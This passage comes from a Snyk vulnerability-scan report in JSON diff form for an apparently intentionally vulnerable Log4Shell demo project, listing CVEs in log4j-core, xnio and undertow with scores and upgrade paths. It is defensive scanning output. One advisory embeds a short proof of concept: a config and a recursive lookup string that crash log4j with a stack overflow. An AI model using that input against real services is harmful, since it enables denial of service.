+ "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.16.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.15.0" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": 
"Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! 
%m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.15.0" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + 
"2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", 
+ "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.15.0" + }, + { + "id": "SNYK-JAVA-ORGJBOSSXNIO-2994360", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.8.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.8.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.jboss.xnio:xnio-api", + "references": [ + { + "url": "https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/xnio/xnio/pull/291", + "title": "GitHub PR" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064226", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-27T13:34:34.076065Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:50.426700Z" + } + ], + "cvssSources": [ + { + 
"type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:00.412483Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-27T13:34:34.076065Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:50.426700Z" + } + ], + "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the `notifyReadClosed` method by allowing an attacker to send flawed requests to a server, possibly causing log contention-related performance concerns or an unwanted disk fill-up.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.8 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12)\n- [GitHub PR](https://github.com/xnio/xnio/pull/291)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2064226)\n", + "epssDetails": { + "percentile": "0.53436", + "probability": "0.00164", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-0084" + ], + "CWE": [ + "CWE-770" + ], + "GHSA": [ + "GHSA-76fg-mhrg-fmmg" + ] + }, + "packageName": "org.jboss.xnio:xnio-api", + "proprietary": false, + "creationTime": "2022-08-28T06:46:31.563692Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-08-28T06:35:33Z", + "exploitDetails": { + "sources": [], 
+ "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.jboss.xnio", + "artifactId": "xnio-api" + }, + "publicationTime": "2022-08-28T09:48:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-27T13:34:34.076065Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final", + "org.jboss.xnio:xnio-api@3.8.16.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.jboss.xnio:xnio-api", + "version": "3.8.4.Final" + }, + { + "id": "SNYK-JAVA-ORGJBOSSXNIO-6403375", + "title": "Uncontrolled Resource Consumption", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.8.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.8.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.jboss.xnio:xnio-api", + "references": [ + { + "url": "https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241822", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-27T13:45:18.043553Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": 
"Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-24T07:16:49.813145Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-27T13:45:18.043553Z" + } + ], + "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption due to the `NotifierState` function that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large, leading to a possible denial of service.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.14 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2241822)\n", + "epssDetails": { + "percentile": "0.10602", + "probability": "0.00044", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-5685" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.jboss.xnio:xnio-api", + "proprietary": false, + "creationTime": "2024-03-06T14:54:57.557703Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-03-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.jboss.xnio", + "artifactId": "xnio-api" + }, + "publicationTime": "2024-03-07T06:05:43.052310Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-27T13:45:18.043553Z", + 
"socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final", + "org.jboss.xnio:xnio-api@3.8.16.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.jboss.xnio:xnio-api", + "version": "3.8.4.Final" + } + ], + "ok": false, + "dependencyCount": 12, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": 
"MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "21 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-IOUNDERTOW-7433721", + "title": "Memory Leak", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 2.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/errata/RHSA-2024:4392", + "title": "Red Hat Security Advisory" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 2.3, + "cvssVersion": "4.0", + "modificationTime": "2024-07-10T14:39:24.891744Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-10T14:39:24.891744Z" + } + ], + "description": "## 
Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", + "epssDetails": { + "percentile": "0.16001", + "probability": "0.00045", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-3653" + ], + "CWE": [ + "CWE-401" + ], + "GHSA": [ + "GHSA-ch7q-gpff-h9hp" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-07-10T07:43:42.505449Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-07-09T00:31:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-07-10T14:39:24.891304Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-10T14:39:24.891744Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [], + "isUpgradable": false, 
+ "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final", + "severityWithCritical": "low" + } + ], + "upgrade": { + "com.unboundid:unboundid-ldapsdk@3.1.1": { + "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5", + "upgrades": [ + "com.unboundid:unboundid-ldapsdk@3.1.1" + ], + "vulns": [ + "SNYK-JAVA-COMUNBOUNDID-32143" + ] + }, + "commons-collections:commons-collections@3.1": { + "upgradeTo": "commons-collections:commons-collections@3.2.2", + "upgrades": [ + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1" + ], + "vulns": [ + "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" + ] + }, + "io.undertow:undertow-core@2.2.13.Final": { + "upgradeTo": "io.undertow:undertow-core@2.3.8.Final", + "upgrades": [ + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final" + ], + "vulns": [ + "SNYK-JAVA-IOUNDERTOW-7433720", + "SNYK-JAVA-IOUNDERTOW-7300152", + "SNYK-JAVA-IOUNDERTOW-7300153", + "SNYK-JAVA-IOUNDERTOW-7361775", + "SNYK-JAVA-ORGJBOSSXNIO-2994360", + "SNYK-JAVA-ORGJBOSSXNIO-6403375", + "SNYK-JAVA-IOUNDERTOW-6567186", + "SNYK-JAVA-IOUNDERTOW-6669948", + "SNYK-JAVA-IOUNDERTOW-3358786", + "SNYK-JAVA-IOUNDERTOW-3339519", + "SNYK-JAVA-IOUNDERTOW-2871356", + "SNYK-JAVA-IOUNDERTOW-3012383", + "SNYK-JAVA-IOUNDERTOW-2391283" + ] + }, + 
"org.apache.logging.log4j:log4j-core@2.15.0": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.15.0", + "org.apache.logging.log4j:log4j-core@2.15.0", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 21, + "projectName": "io.snyk:log4shell-server", + "foundProjectCount": 7, + "displayTargetFile": "log4shell-goof/log4shell-server/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [], + "ok": true, + "dependencyCount": 3, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + 